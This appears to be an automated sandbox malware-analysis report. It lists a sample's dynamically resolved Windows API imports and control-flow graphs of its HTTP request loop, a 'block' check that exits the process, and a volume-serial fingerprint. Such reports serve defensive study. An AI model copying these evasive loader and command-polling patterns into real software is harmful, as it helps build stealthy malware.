                          • GetProcAddress.KERNEL32(74DD0000,00E3D230), ref: 00399EA6
                          • GetProcAddress.KERNEL32(74DD0000,00E3D1E8), ref: 00399EBE
                          • GetProcAddress.KERNEL32(74DD0000,00E3D380), ref: 00399ED6
                          • GetProcAddress.KERNEL32(74DD0000,00E3D290), ref: 00399EEF
                          • GetProcAddress.KERNEL32(74DD0000,00E3D368), ref: 00399F07
                          • GetProcAddress.KERNEL32(74DD0000,00E3D2A8), ref: 00399F1F
                          • GetProcAddress.KERNEL32(74DD0000,00E3D2C0), ref: 00399F38
                          • GetProcAddress.KERNEL32(74DD0000,00E3A3C0), ref: 00399F50
                          • GetProcAddress.KERNEL32(74DD0000,00E3D128), ref: 00399F68
                          • GetProcAddress.KERNEL32(74DD0000,00E3D140), ref: 00399F81
                          • GetProcAddress.KERNEL32(74DD0000,00E259F0), ref: 00399F99
                          • GetProcAddress.KERNEL32(74DD0000,00E3D158), ref: 00399FB1
                          • GetProcAddress.KERNEL32(74DD0000,00E25A10), ref: 00399FCA
                          • GetProcAddress.KERNEL32(74DD0000,00E3D170), ref: 00399FE2
                          • GetProcAddress.KERNEL32(74DD0000,00E3D1B8), ref: 00399FFA
                          • GetProcAddress.KERNEL32(74DD0000,00E25A30), ref: 0039A013
                          • GetProcAddress.KERNEL32(74DD0000,00E25B10), ref: 0039A02B
                          • LoadLibraryA.KERNEL32(00E3D308,?,00395CA3,003A0AEB,?,?,?,?,?,?,?,?,?,?,003A0AEA,003A0AE3), ref: 0039A03D
                          • LoadLibraryA.KERNEL32(00E3D338,?,00395CA3,003A0AEB,?,?,?,?,?,?,?,?,?,?,003A0AEA,003A0AE3), ref: 0039A04E
                          • LoadLibraryA.KERNEL32(00E3D3C8,?,00395CA3,003A0AEB,?,?,?,?,?,?,?,?,?,?,003A0AEA,003A0AE3), ref: 0039A060
                          • LoadLibraryA.KERNEL32(00E3D188,?,00395CA3,003A0AEB,?,?,?,?,?,?,?,?,?,?,003A0AEA,003A0AE3), ref: 0039A072
                          • LoadLibraryA.KERNEL32(00E3D1A0,?,00395CA3,003A0AEB,?,?,?,?,?,?,?,?,?,?,003A0AEA,003A0AE3), ref: 0039A083
                          • LoadLibraryA.KERNEL32(00E3D350,?,00395CA3,003A0AEB,?,?,?,?,?,?,?,?,?,?,003A0AEA,003A0AE3), ref: 0039A095
                          • LoadLibraryA.KERNEL32(00E3D1D0,?,00395CA3,003A0AEB,?,?,?,?,?,?,?,?,?,?,003A0AEA,003A0AE3), ref: 0039A0A7
                          • LoadLibraryA.KERNEL32(00E3D398,?,00395CA3,003A0AEB,?,?,?,?,?,?,?,?,?,?,003A0AEA,003A0AE3), ref: 0039A0B8
                          • GetProcAddress.KERNEL32(75290000,00E25C50), ref: 0039A0DA
                          • GetProcAddress.KERNEL32(75290000,00E3D470), ref: 0039A0F2
                          • GetProcAddress.KERNEL32(75290000,00E38F18), ref: 0039A10A
                          • GetProcAddress.KERNEL32(75290000,00E3D4D0), ref: 0039A123
                          • GetProcAddress.KERNEL32(75290000,00E25AD0), ref: 0039A13B
                          • GetProcAddress.KERNEL32(6FD40000,00E2BA18), ref: 0039A160
                          • GetProcAddress.KERNEL32(6FD40000,00E25AF0), ref: 0039A179
                          • GetProcAddress.KERNEL32(6FD40000,00E2B860), ref: 0039A191
                          • GetProcAddress.KERNEL32(6FD40000,00E3D530), ref: 0039A1A9
                          • GetProcAddress.KERNEL32(6FD40000,00E3D488), ref: 0039A1C2
                          • GetProcAddress.KERNEL32(6FD40000,00E25AB0), ref: 0039A1DA
                          • GetProcAddress.KERNEL32(6FD40000,00E25B70), ref: 0039A1F2
                          • GetProcAddress.KERNEL32(6FD40000,00E3D518), ref: 0039A20B
                          • GetProcAddress.KERNEL32(752C0000,00E25E30), ref: 0039A22C
                          • GetProcAddress.KERNEL32(752C0000,00E25C70), ref: 0039A244
                          • GetProcAddress.KERNEL32(752C0000,00E3D548), ref: 0039A25D
                          • GetProcAddress.KERNEL32(752C0000,00E3D560), ref: 0039A275
                          • GetProcAddress.KERNEL32(752C0000,00E25D70), ref: 0039A28D
                          • GetProcAddress.KERNEL32(74EC0000,00E2B9A0), ref: 0039A2B3
                          • GetProcAddress.KERNEL32(74EC0000,00E2B9C8), ref: 0039A2CB
                          • GetProcAddress.KERNEL32(74EC0000,00E3D578), ref: 0039A2E3
                          • GetProcAddress.KERNEL32(74EC0000,00E25E10), ref: 0039A2FC
                          • GetProcAddress.KERNEL32(74EC0000,00E25D30), ref: 0039A314
                          • GetProcAddress.KERNEL32(74EC0000,00E2B6A8), ref: 0039A32C
                          • GetProcAddress.KERNEL32(75BD0000,00E3D4B8), ref: 0039A352
                          • GetProcAddress.KERNEL32(75BD0000,00E25DD0), ref: 0039A36A
                          • GetProcAddress.KERNEL32(75BD0000,00E38F88), ref: 0039A382
                          • GetProcAddress.KERNEL32(75BD0000,00E3D410), ref: 0039A39B
                          • GetProcAddress.KERNEL32(75BD0000,00E3D428), ref: 0039A3B3
                          • GetProcAddress.KERNEL32(75BD0000,00E25D50), ref: 0039A3CB
                          • GetProcAddress.KERNEL32(75BD0000,00E25D90), ref: 0039A3E4
                          • GetProcAddress.KERNEL32(75BD0000,00E3D4E8), ref: 0039A3FC
                          • GetProcAddress.KERNEL32(75BD0000,00E3D590), ref: 0039A414
                          • GetProcAddress.KERNEL32(75A70000,00E25BD0), ref: 0039A436
                          • GetProcAddress.KERNEL32(75A70000,00E3D458), ref: 0039A44E
                          • GetProcAddress.KERNEL32(75A70000,00E3D440), ref: 0039A466
                          • GetProcAddress.KERNEL32(75A70000,00E3D5A8), ref: 0039A47F
                          • GetProcAddress.KERNEL32(75A70000,00E3D3F8), ref: 0039A497
                          • GetProcAddress.KERNEL32(75450000,00E25B90), ref: 0039A4B8
                          • GetProcAddress.KERNEL32(75450000,00E25DB0), ref: 0039A4D1
                          • GetProcAddress.KERNEL32(75DA0000,00E25C10), ref: 0039A4F2
                          • GetProcAddress.KERNEL32(75DA0000,00E3D500), ref: 0039A50A
                          • GetProcAddress.KERNEL32(6F040000,00E25B50), ref: 0039A530
                          • GetProcAddress.KERNEL32(6F040000,00E25E50), ref: 0039A548
                          • GetProcAddress.KERNEL32(6F040000,00E25C30), ref: 0039A560
                          • GetProcAddress.KERNEL32(6F040000,00E3D4A0), ref: 0039A579
                          • GetProcAddress.KERNEL32(6F040000,00E25DF0), ref: 0039A591
                          • GetProcAddress.KERNEL32(6F040000,00E25BF0), ref: 0039A5A9
                          • GetProcAddress.KERNEL32(6F040000,00E25B30), ref: 0039A5C2
                          • GetProcAddress.KERNEL32(6F040000,00E25BB0), ref: 0039A5DA
                          • GetProcAddress.KERNEL32(6F040000,InternetSetOptionA), ref: 0039A5F1
                          • GetProcAddress.KERNEL32(6F040000,HttpQueryInfoA), ref: 0039A607
                          • GetProcAddress.KERNEL32(75AF0000,00E3CF00), ref: 0039A629
                          • GetProcAddress.KERNEL32(75AF0000,00E38F48), ref: 0039A641
                          • GetProcAddress.KERNEL32(75AF0000,00E3CF60), ref: 0039A659
                          • GetProcAddress.KERNEL32(75AF0000,00E3CF48), ref: 0039A672
                          • GetProcAddress.KERNEL32(75D90000,00E25C90), ref: 0039A693
                          • GetProcAddress.KERNEL32(6F7A0000,00E3D0C8), ref: 0039A6B4
                          • GetProcAddress.KERNEL32(6F7A0000,00E25CB0), ref: 0039A6CD
                          • GetProcAddress.KERNEL32(6F7A0000,00E3CE70), ref: 0039A6E5
                          • GetProcAddress.KERNEL32(6F7A0000,00E3D008), ref: 0039A6FD
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          • Associated: 00000000.00000002.1699316692.0000000000380000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699333650.0000000000431000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699333650.000000000043D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699333650.0000000000462000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699333650.00000000005CA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.00000000005DE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.0000000000761000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.000000000086E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.0000000000876000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.0000000000885000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1701106467.0000000000886000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1701232842.0000000000A2A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1701247475.0000000000A2B000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc$LibraryLoad
                          • String ID: 0Y$0Z$0[$0\$0]$0^$HttpQueryInfoA$InternetSetOptionA$P[$P\$P]$P^$pW$pX$pY$p[$p\$p]
                          • API String ID: 2238633743-1295162599
                          • Opcode ID: 0fbb0d7a8573fbd0b5be1b57571cb6898d4332bce4a805b3f11da1d68ecdc510
                          • Instruction ID: 701fd599167cd8c19d1371658738c6bee902014338ffe8dcf5958d3c3943077f
                          • Opcode Fuzzy Hash: 0fbb0d7a8573fbd0b5be1b57571cb6898d4332bce4a805b3f11da1d68ecdc510
                          • Instruction Fuzzy Hash: D0628DB5500A48AFC748DFA8FD88D563FF9F7AC309304851AA609C3225D739985AFF52

                          Control-flow Graph

                          control_flow_graph 1033 395510-395577 call 395ad0 call 39a820 * 3 call 39a740 * 4 1049 39557c-395583 1033->1049 1050 395585-3955b6 call 39a820 call 39a7a0 call 381590 call 3951f0 1049->1050 1051 3955d7-39564c call 39a740 * 2 call 381590 call 3952c0 call 39a8a0 call 39a800 call 39aad0 StrCmpCA 1049->1051 1066 3955bb-3955d2 call 39a8a0 call 39a800 1050->1066 1077 395693-3956a9 call 39aad0 StrCmpCA 1051->1077 1081 39564e-39568e call 39a7a0 call 381590 call 3951f0 call 39a8a0 call 39a800 1051->1081 1066->1077 1082 3957dc-395844 call 39a8a0 call 39a820 * 2 call 381670 call 39a800 * 4 call 396560 call 381550 1077->1082 1083 3956af-3956b6 1077->1083 1081->1077 1212 395ac3-395ac6 1082->1212 1085 3957da-39585f call 39aad0 StrCmpCA 1083->1085 1086 3956bc-3956c3 1083->1086 1105 395991-3959f9 call 39a8a0 call 39a820 * 2 call 381670 call 39a800 * 4 call 396560 call 381550 1085->1105 1106 395865-39586c 1085->1106 1089 39571e-395793 call 39a740 * 2 call 381590 call 3952c0 call 39a8a0 call 39a800 call 39aad0 StrCmpCA 1086->1089 1090 3956c5-395719 call 39a820 call 39a7a0 call 381590 call 3951f0 call 39a8a0 call 39a800 1086->1090 1089->1085 1188 395795-3957d5 call 39a7a0 call 381590 call 3951f0 call 39a8a0 call 39a800 1089->1188 1090->1085 1105->1212 1111 39598f-395a14 call 39aad0 StrCmpCA 1106->1111 1112 395872-395879 1106->1112 1141 395a28-395a91 call 39a8a0 call 39a820 * 2 call 381670 call 39a800 * 4 call 396560 call 381550 1111->1141 1142 395a16-395a21 Sleep 1111->1142 1118 39587b-3958ce call 39a820 call 39a7a0 call 381590 call 3951f0 call 39a8a0 call 39a800 1112->1118 1119 3958d3-395948 call 39a740 * 2 call 381590 call 3952c0 call 39a8a0 call 39a800 call 39aad0 StrCmpCA 1112->1119 1118->1111 1119->1111 1217 39594a-39598a call 39a7a0 call 381590 call 3951f0 call 39a8a0 call 39a800 1119->1217 1141->1212 1142->1049 1188->1085 1217->1111
                          APIs
                            • Part of subcall function 0039A820: lstrlen.KERNEL32(00384F05,?,?,00384F05,003A0DDE), ref: 0039A82B
                            • Part of subcall function 0039A820: lstrcpy.KERNEL32(003A0DDE,00000000), ref: 0039A885
                            • Part of subcall function 0039A740: lstrcpy.KERNEL32(003A0E17,00000000), ref: 0039A788
                          • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00395644
                          • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 003956A1
                          • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00395857
                            • Part of subcall function 0039A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0039A7E6
                            • Part of subcall function 003951F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00395228
                            • Part of subcall function 0039A8A0: lstrcpy.KERNEL32(?,003A0E17), ref: 0039A905
                            • Part of subcall function 003952C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00395318
                            • Part of subcall function 003952C0: lstrlen.KERNEL32(00000000), ref: 0039532F
                            • Part of subcall function 003952C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00395364
                            • Part of subcall function 003952C0: lstrlen.KERNEL32(00000000), ref: 00395383
                            • Part of subcall function 003952C0: lstrlen.KERNEL32(00000000), ref: 003953AE
                          • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0039578B
                          • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00395940
                          • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00395A0C
                          • Sleep.KERNEL32(0000EA60), ref: 00395A1B
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          • Associated: 00000000.00000002.1699316692.0000000000380000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699333650.0000000000431000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699333650.000000000043D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699333650.0000000000462000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699333650.00000000005CA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.00000000005DE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.0000000000761000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.000000000086E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.0000000000876000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.0000000000885000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1701106467.0000000000886000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1701232842.0000000000A2A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1701247475.0000000000A2B000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpylstrlen$Sleep
                          • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$PX
                          • API String ID: 507064821-99763959
                          • Opcode ID: 3fd0a8401a81ffe40299dd41d5a2dd4bd50e91e3b563ac4c6954d3d94f418a3e
                          • Instruction ID: 2960518bf6c2880505fcc4c67a64aaca3d9fbfc4db0db7590fa2eb74dbc8b190
                          • Opcode Fuzzy Hash: 3fd0a8401a81ffe40299dd41d5a2dd4bd50e91e3b563ac4c6954d3d94f418a3e
                          • Instruction Fuzzy Hash: F4E13072910A089ADF16FBB0DC97EED777CAF54300F408668B4066A091EF346A4DDBD2

                          Control-flow Graph

                          control_flow_graph 1244 386280-38630b call 39a7a0 call 3847b0 call 39a740 InternetOpenA StrCmpCA 1251 38630d 1244->1251 1252 386314-386318 1244->1252 1251->1252 1253 386509-386525 call 39a7a0 call 39a800 * 2 1252->1253 1254 38631e-386342 InternetConnectA 1252->1254 1273 386528-38652d 1253->1273 1256 386348-38634c 1254->1256 1257 3864ff-386503 InternetCloseHandle 1254->1257 1259 38635a 1256->1259 1260 38634e-386358 1256->1260 1257->1253 1262 386364-386392 HttpOpenRequestA 1259->1262 1260->1262 1264 386398-38639c 1262->1264 1265 3864f5-3864f9 InternetCloseHandle 1262->1265 1267 38639e-3863bf InternetSetOptionA 1264->1267 1268 3863c5-386405 HttpSendRequestA HttpQueryInfoA 1264->1268 1265->1257 1267->1268 1270 38642c-38644b call 398940 1268->1270 1271 386407-386427 call 39a740 call 39a800 * 2 1268->1271 1278 3864c9-3864e9 call 39a740 call 39a800 * 2 1270->1278 1279 38644d-386454 1270->1279 1271->1273 1278->1273 1282 386456-386480 InternetReadFile 1279->1282 1283 3864c7-3864ef InternetCloseHandle 1279->1283 1287 38648b 1282->1287 1288 386482-386489 1282->1288 1283->1265 1287->1283 1288->1287 1291 38648d-3864c5 call 39a9b0 call 39a8a0 call 39a800 1288->1291 1291->1282
                          APIs
                            • Part of subcall function 0039A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0039A7E6
                            • Part of subcall function 003847B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00384839
                            • Part of subcall function 003847B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00384849
                            • Part of subcall function 0039A740: lstrcpy.KERNEL32(003A0E17,00000000), ref: 0039A788
                          • InternetOpenA.WININET(003A0DFE,00000001,00000000,00000000,00000000), ref: 003862E1
                          • StrCmpCA.SHLWAPI(?,00E3EA88), ref: 00386303
                          • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00386335
                          • HttpOpenRequestA.WININET(00000000,GET,?,00E3DFD8,00000000,00000000,00400100,00000000), ref: 00386385
                          • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 003863BF
                          • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 003863D1
                          • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 003863FD
                          • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0038646D
                          • InternetCloseHandle.WININET(00000000), ref: 003864EF
                          • InternetCloseHandle.WININET(00000000), ref: 003864F9
                          • InternetCloseHandle.WININET(00000000), ref: 00386503
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          • Associated: 00000000.00000002.1699316692.0000000000380000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699333650.0000000000431000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699333650.000000000043D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699333650.0000000000462000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699333650.00000000005CA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.00000000005DE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.0000000000761000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.000000000086E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.0000000000876000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.0000000000885000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1701106467.0000000000886000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1701232842.0000000000A2A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1701247475.0000000000A2B000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                          • String ID: ERROR$ERROR$GET
                          • API String ID: 3749127164-2509457195
                          • Opcode ID: ec90eb388166349e750661b16670738f55a2a616ee9d471b54b616c3e386faf6
                          • Instruction ID: 09556aedb75f6a886fd4a2da66488018361f6e102fd6a5948261133a35a7eca2
                          • Opcode Fuzzy Hash: ec90eb388166349e750661b16670738f55a2a616ee9d471b54b616c3e386faf6
                          • Instruction Fuzzy Hash: 5D714E71A00318ABDF15EBA0CC4AFEE77B8FB44704F104198F10A6B190DBB46A89DF91

                          Control-flow Graph

                          control_flow_graph 1301 3917a0-3917cd call 39aad0 StrCmpCA 1304 3917cf-3917d1 ExitProcess 1301->1304 1305 3917d7-3917f1 call 39aad0 1301->1305 1309 3917f4-3917f8 1305->1309 1310 3917fe-391811 1309->1310 1311 3919c2-3919cd call 39a800 1309->1311 1313 39199e-3919bd 1310->1313 1314 391817-39181a 1310->1314 1313->1309 1316 39185d-39186e StrCmpCA 1314->1316 1317 39187f-391890 StrCmpCA 1314->1317 1318 3918f1-391902 StrCmpCA 1314->1318 1319 391951-391962 StrCmpCA 1314->1319 1320 391970-391981 StrCmpCA 1314->1320 1321 391913-391924 StrCmpCA 1314->1321 1322 391932-391943 StrCmpCA 1314->1322 1323 391835-391844 call 39a820 1314->1323 1324 391849-391858 call 39a820 1314->1324 1325 3918ad-3918be StrCmpCA 1314->1325 1326 3918cf-3918e0 StrCmpCA 1314->1326 1327 39198f-391999 call 39a820 1314->1327 1328 391821-391830 call 39a820 1314->1328 1330 39187a 1316->1330 1331 391870-391873 1316->1331 1332 39189e-3918a1 1317->1332 1333 391892-39189c 1317->1333 1338 39190e 1318->1338 1339 391904-391907 1318->1339 1344 39196e 1319->1344 1345 391964-391967 1319->1345 1347 39198d 1320->1347 1348 391983-391986 1320->1348 1340 391930 1321->1340 1341 391926-391929 1321->1341 1342 39194f 1322->1342 1343 391945-391948 1322->1343 1323->1313 1324->1313 1334 3918ca 1325->1334 1335 3918c0-3918c3 1325->1335 1336 3918ec 1326->1336 1337 3918e2-3918e5 1326->1337 1327->1313 1328->1313 1330->1313 1331->1330 1353 3918a8 1332->1353 1333->1353 1334->1313 1335->1334 1336->1313 1337->1336 1338->1313 1339->1338 1340->1313 1341->1340 1342->1313 1343->1342 1344->1313 1345->1344 1347->1313 1348->1347 1353->1313
                          APIs
                          • StrCmpCA.SHLWAPI(00000000,block), ref: 003917C5
                          • ExitProcess.KERNEL32 ref: 003917D1
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          • Associated: 00000000.00000002.1699316692.0000000000380000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699333650.0000000000431000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699333650.000000000043D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699333650.0000000000462000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699333650.00000000005CA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.00000000005DE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.0000000000761000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.000000000086E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.0000000000876000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.0000000000885000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1701106467.0000000000886000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1701232842.0000000000A2A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1701247475.0000000000A2B000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExitProcess
                          • String ID: block
                          • API String ID: 621844428-2199623458
                          • Opcode ID: 45362a159ce7b8b07bcdae3b719556a16a4fc536f2b56e5ff6b7b784dd0e47b4
                          • Instruction ID: 03ec4cd21dd437ab464e0d6acc18068aa7674c7eb7794b1445c382318068ef74
                          • Opcode Fuzzy Hash: 45362a159ce7b8b07bcdae3b719556a16a4fc536f2b56e5ff6b7b784dd0e47b4
                          • Instruction Fuzzy Hash: 78512AB5A1420AEFDF06DFA0D954ABE7BB9BF44704F108048E406BB240D771ED55DBA2

                          Control-flow Graph

                          control_flow_graph 1356 397500-39754a GetWindowsDirectoryA 1357 39754c 1356->1357 1358 397553-3975c7 GetVolumeInformationA call 398d00 * 3 1356->1358 1357->1358 1365 3975d8-3975df 1358->1365 1366 3975fc-397617 GetProcessHeap RtlAllocateHeap 1365->1366 1367 3975e1-3975fa call 398d00 1365->1367 1368 397619-397626 call 39a740 1366->1368 1369 397628-397658 wsprintfA call 39a740 1366->1369 1367->1365 1377 39767e-39768e 1368->1377 1369->1377
                          APIs
                          • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00397542
                          • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0039757F
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00397603
                          • RtlAllocateHeap.NTDLL(00000000), ref: 0039760A
                          • wsprintfA.USER32 ref: 00397640
                            • Part of subcall function 0039A740: lstrcpy.KERNEL32(003A0E17,00000000), ref: 0039A788
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          • Associated: 00000000.00000002.1699316692.0000000000380000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699333650.0000000000431000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699333650.000000000043D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699333650.0000000000462000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699333650.00000000005CA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.00000000005DE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.0000000000761000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.000000000086E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.0000000000876000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.0000000000885000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1701106467.0000000000886000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1701232842.0000000000A2A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1701247475.0000000000A2B000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                          • String ID: :$C$\$:
                          • API String ID: 1544550907-1412321837
                          • Opcode ID: 741796597e30412a01a4f310c777f1c855247012c46c28d6e023d593188b5bce
                          • Instruction ID: 61c188e0507cf1b58587fabe839c859a9a09381a3f544cb2e4be1d17dd3b4d98
                          • Opcode Fuzzy Hash: 741796597e30412a01a4f310c777f1c855247012c46c28d6e023d593188b5bce
                          • Instruction Fuzzy Hash: 1041C2B1D04248ABDF11DF94CC45FEEBBB8EF18704F100198F509AB280D7786A48CBA5

                          Control-flow Graph

                          APIs
                            • Part of subcall function 00399860: GetProcAddress.KERNEL32(74DD0000,00E324E8), ref: 003998A1
                            • Part of subcall function 00399860: GetProcAddress.KERNEL32(74DD0000,00E32440), ref: 003998BA
                            • Part of subcall function 00399860: GetProcAddress.KERNEL32(74DD0000,00E32248), ref: 003998D2
                            • Part of subcall function 00399860: GetProcAddress.KERNEL32(74DD0000,00E324A0), ref: 003998EA
                            • Part of subcall function 00399860: GetProcAddress.KERNEL32(74DD0000,00E322F0), ref: 00399903
                            • Part of subcall function 00399860: GetProcAddress.KERNEL32(74DD0000,00E38F68), ref: 0039991B
                            • Part of subcall function 00399860: GetProcAddress.KERNEL32(74DD0000,00E258D0), ref: 00399933
                            • Part of subcall function 00399860: GetProcAddress.KERNEL32(74DD0000,00E258B0), ref: 0039994C
                            • Part of subcall function 00399860: GetProcAddress.KERNEL32(74DD0000,00E32470), ref: 00399964
                            • Part of subcall function 00399860: GetProcAddress.KERNEL32(74DD0000,00E32260), ref: 0039997C
                            • Part of subcall function 00399860: GetProcAddress.KERNEL32(74DD0000,00E324D0), ref: 00399995
                            • Part of subcall function 00399860: GetProcAddress.KERNEL32(74DD0000,00E32500), ref: 003999AD
                            • Part of subcall function 00399860: GetProcAddress.KERNEL32(74DD0000,00E25910), ref: 003999C5
                            • Part of subcall function 00399860: GetProcAddress.KERNEL32(74DD0000,00E32278), ref: 003999DE
